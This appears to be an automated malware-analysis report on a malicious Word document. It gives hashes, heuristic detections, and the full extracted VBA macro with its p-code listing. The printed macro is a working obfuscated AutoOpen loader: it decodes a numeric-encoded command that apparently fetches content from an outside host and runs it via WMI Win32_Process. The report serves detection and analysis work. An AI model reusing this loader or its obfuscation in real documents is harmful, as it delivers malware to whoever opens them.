Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 da7a785c217785a1…

MALICIOUS

Office (OLE) / .DOC

Size: 52.0 KB
Created: 2026-06-07 14:27:00
Authoring application: Microsoft Office Word
First seen: 2026-06-28
MD5: 50d9e23755c8eff45b7ea2220c6f2651
SHA-1: ed115acb379bdb2baca891d137fb6eb17b7567ab
SHA-256: da7a785c217785a1537ba63ff4bf2134847da112c883960128a54048cc9daf65
Risk Score: 190

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10694 bytes
SHA-256: 8a1cd5e2af71d3f4cda1f46e453405802fd965359c56550a717c7831a12f93ea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu
End Sub

Sub FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu()
    Dim vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN As String
    Dim sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu As String
    
    vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN = "19920920014620122020113214719913213420020120813214" & _
    "72021321472131321671581921872052102002112192151921" & _
    "84197215207215192201210199146216220216132150162210" & _
    "21720813213813220020120813214720213214721313216715" & _
    "81921872052102002112192151921841972152072151921971" & _
    "46201220201132150162210217208132138132198205216215" & _
    "19720020920521013214718421419721021520220121413221" & _
    "62042011742111981322042162162121581471471491571501" & _
    "46149154156146152153146149153150147180183182217210" & _
    "21521219719920114517321021821120720118221721014519" & _
    "92012142162172162052081672112002012001462162202161" & _
    "32167158192187205210200211219215192184197215207215" & _
    "19220121019914621622021613213813219920121421621721" & _
    "62052081321452002011992112002011321671581921872052" & _
    "10200211219215192184197215207215192201210199146216" & _
    "22021613216715819218720521020021121921519218419721" & _
    "52072151921971462012202011321381321671581921872052" & _
    "10200211219215192177205199214211215211202216146178" & _
    "16918419217021419720920121921121420715415219221815" & _
    "21461481461511481511491571922052102152161972082082" & _
    "17216205208146201220201132147208211203202205208201" & _
    "16113214717621120318421116721121021521120820116120" & _
    "21972082152011321471851321671581921872052102002112" & _
    "19215192184197215207215192197146201220201134"
    

    sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR(vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN)
    On Error Resume Next
    If ActiveDocument.Name <> zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("204201208208211146200211199") Then
        Exit Sub
    End If
    On Error GoTo 0
    

    Dim aHDFOqXekZrYdocrOpNOsjdQRoDghfW As String
    Dim obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM As String
    Dim iDiFwSGgutwANWqgSXDhnaAKC As Variant
    Dim OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS As Variant


    aHDFOqXekZrYdocrOpNOsjdQRoDghfW = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("219205210209203209216215158192192146192214211211216192199205209218150")
    obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("187205210151150195180214211199201215215")
    OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS = Null

    GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC


End Sub



Function hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR(FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu)
    hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR = Chr(FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu - 100)
End Function

Function LhBbnQJHaqwydGKtiTwGmpDzV(fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm)
    LhBbnQJHaqwydGKtiTwGmpDzV = Left(fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm, 3)
End Function

Function VddOROxmpnMMdeLojNuwlvgPXmC(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH)
    VddOROxmpnMMdeLojNuwlvgPXmC = Right(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH, Len(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH) - 3)
End Function

Function zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR(pGaVjsZIyajfKIxlkCTLPpVyvJSF)
    Do
        pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW = pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW + hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR(LhBbnQJHaqwydGKtiTwGmpDzV(pGaVjsZIyajfKIxlkCTLPpVyvJSF))
        pGaVjsZIyajfKIxlkCTLPpVyvJSF = VddOROxmpnMMdeLojNuwlvgPXmC(pGaVjsZIyajfKIxlkCTLPpVyvJSF)
    Loop While Len(pGaVjsZIyajfKIxlkCTLPpVyvJSF) > 0
    zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR = pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
End Function


' Processing file: /opt/analyzer/scan_staging/3d031d4574dc4919ba5afd3ed6026e6c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 954 bytes
' Macros/VBA/NewMacros - 8910 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	ArgsCall vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN 0x0000 
' Line #2:
' 	EndSub 
' Line #3:
' Line #4:
' 	FuncDefn (Sub vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN())
' Line #5:
' 	Dim 
' 	VarDefn sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu (As String)
' Line #6:
' 	Dim 
' 	VarDefn zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR (As String)
' Line #7:
' Line #8:
' 	LineCont 0x005C 04 00 04 00 06 00 04 00 08 00 04 00 0A 00 04 00 0C 00 04 00 0E 00 04 00 10 00 04 00 12 00 04 00 14 00 04 00 16 00 04 00 18 00 04 00 1A 00 04 00 1C 00 04 00 1E 00 04 00 20 00 04 00 22 00 04 00 24 00 04 00 26 00 04 00 28 00 04 00 2A 00 04 00 2C 00 04 00 2E 00 04 00 30 00 04 00
' 	LitStr 0x0032 "19920920014620122020113214719913213420020120813214"
' 	LitStr 0x0032 "72021321472131321671581921872052102002112192151921"
' 	Concat 
' 	LitStr 0x0032 "84197215207215192201210199146216220216132150162210"
' 	Concat 
' 	LitStr 0x0032 "21720813213813220020120813214720213214721313216715"
' 	Concat 
' 	LitStr 0x0032 "81921872052102002112192151921841972152072151921971"
' 	Concat 
' 	LitStr 0x0032 "46201220201132150162210217208132138132198205216215"
' 	Concat 
' 	LitStr 0x0032 "19720020920521013214718421419721021520220121413221"
' 	Concat 
' 	LitStr 0x0032 "62042011742111981322042162162121581471471491571501"
' 	Concat 
' 	LitStr 0x0032 "46149154156146152153146149153150147180183182217210"
' 	Concat 
' 	LitStr 0x0032 "21521219719920114517321021821120720118221721014519"
' 	Concat 
' 	LitStr 0x0032 "92012142162172162052081672112002012001462162202161"
' 	Concat 
' 	LitStr 0x0032 "32167158192187205210200211219215192184197215207215"
' 	Concat 
' 	LitStr 0x0032 "19220121019914621622021613213813219920121421621721"
' 	Concat 
' 	LitStr 0x0032 "62052081321452002011992112002011321671581921872052"
' 	Concat 
' 	LitStr 0x0032 "10200211219215192184197215207215192201210199146216"
' 	Concat 
' 	LitStr 0x0032 "22021613216715819218720521020021121921519218419721"
' 	Concat 
' 	LitStr 0x0032 "52072151921971462012202011321381321671581921872052"
' 	Concat 
' 	LitStr 0x0032 "10200211219215192177205199214211215211202216146178"
' 	Concat 
' 	LitStr 0x0032 "16918419217021419720920121921121420715415219221815"
' 	Concat 
' 	LitStr 0x0032 "21461481461511481511491571922052102152161972082082"
' 	Concat 
' 	LitStr 0x0032 "17216205208146201220201132147208211203202205208201"
' 	Concat 
' 	LitStr 0x0032 "16113214717621120318421116721121021521120820116120"
' 	Concat 
' 	LitStr 0x0032 "21972082152011321471851321671581921872052102002112"
' 	Concat 
' 	LitStr 0x002C "19215192184197215207215192197146201220201134"
' 	Concat 
' 	St sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu 
' Line #9:
' Line #10:
' Line #11:
' 	Ld sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu 
' 	ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001 
' 	St zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR 
' Line #12:
' 	OnError (Resume Next) 
' Line #13:
' 	Ld ActiveDocument 
' 	MemLd Name 
' 	LitStr 0x001B "204201208208211146200211199"
' 	ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001 
' 	Ne 
' 	IfBlock 
' Line #14:
' 	ExitSub 
' Line #15:
' 	EndIfBlock 
' Line #16:
' 	OnError (GoTo 0) 
' Line #17:
' Line #18:
' Line #19:
' 	Dim 
' 	VarDefn obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM (As String)
' Line #20:
' 	Dim 
' 	VarDefn iDiFwSGgutwANWqgSXDhnaAKC (As String)
' Line #21:
' 	Dim 
' 	VarDefn OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS (As Variant)
' Line #22:
' 	Dim 
' 	VarDefn hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR (As Variant)
' Line #23:
' Line #24:
' Line #25:
' 	LitStr 0x0045 "219205210209203209216215158192192146192214211211216192199205209218150"
' 	ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001 
' 	St obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM 
' Line #26:
' 	LitStr 0x0027 "187205210151150195180214211199201215215"
' 	ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001 
' 	St iDiFwSGgutwANWqgSXDhnaAKC 
' Line #27:
' 	LitVarSpecial (Null)
' 	St hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR 
' Line #28:
' Line #29:
' 	Ld zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR 
' 	Ld hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR 
' 	Ld hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR 
' 	Ld OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS 
' 	Ld iDiFwSGgutwANWqgSXDhnaAKC 
' 	Ld obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM 
' 	ArgsLd GetObject 0x0001 
' 	ArgsMemLd Get 0x0001 
' 	ArgsMemCall Create 0x0004 
' Line #30:
' Line #31:
' Line #32:
' 	EndSub 
' Line #33:
' Line #34:
' Line #35:
' Line #36:
' 	FuncDefn (Function LhBbnQJHaqwydGKtiTwGmpDzV(vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN))
' Line #37:
' 	Ld vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN 
' 	LitDI2 0x0064 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	St LhBbnQJHaqwydGKtiTwGmpDzV 
' Line #38:
' 	EndFunc 
' Line #39:
' Line #40:
' 	FuncDefn (Function fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm(VddOROxmpnMMdeLojNuwlvgPXmC))
' Line #41:
' 	Ld VddOROxmpnMMdeLojNuwlvgPXmC 
' 	LitDI2 0x0003 
' 	ArgsLd Left 0x0002 
' 	St fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm 
' Line #42:
' 	EndFunc 
' Line #43:
' Line #44:
' 	FuncDefn (Function yjKWenHHLnvyCuSHXYCsKhIyTnJGnH(pGaVjsZIyajfKIxlkCTLPpVyvJSF))
' Line #45:
' 	Ld pGaVjsZIyajfKIxlkCTLPpVyvJSF 
' 	Ld pGaVjsZIyajfKIxlkCTLPpVyvJSF 
' 	FnLen 
' 	LitDI2 0x0003 
' 	Sub 
' 	ArgsLd Right 0x0002 
' 	St yjKWenHHLnvyCuSHXYCsKhIyTnJGnH 
' Line #46:
' 	EndFunc 
' Line #47:
' Line #48:
' 	FuncDefn (Function aHDFOqXekZrYdocrOpNOsjdQRoDghfW(pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW))
' Line #49:
' 	Do 
' Line #50:
' 	Ld _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' 	Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' 	ArgsLd fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm 0x0001 
' 	ArgsLd LhBbnQJHaqwydGKtiTwGmpDzV 0x0001 
' 	Add 
' 	St _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' Line #51:
' 	Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' 	ArgsLd yjKWenHHLnvyCuSHXYCsKhIyTnJGnH 0x0001 
' 	St pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' Line #52:
' 	Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' 	FnLen 
' 	LitDI2 0x0000 
' 	Gt 
' 	LoopWhile 
' Line #53:
' 	Ld _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' 	St aHDFOqXekZrYdocrOpNOsjdQRoDghfW 
' Line #54:
' 	EndFunc 
' Line #55: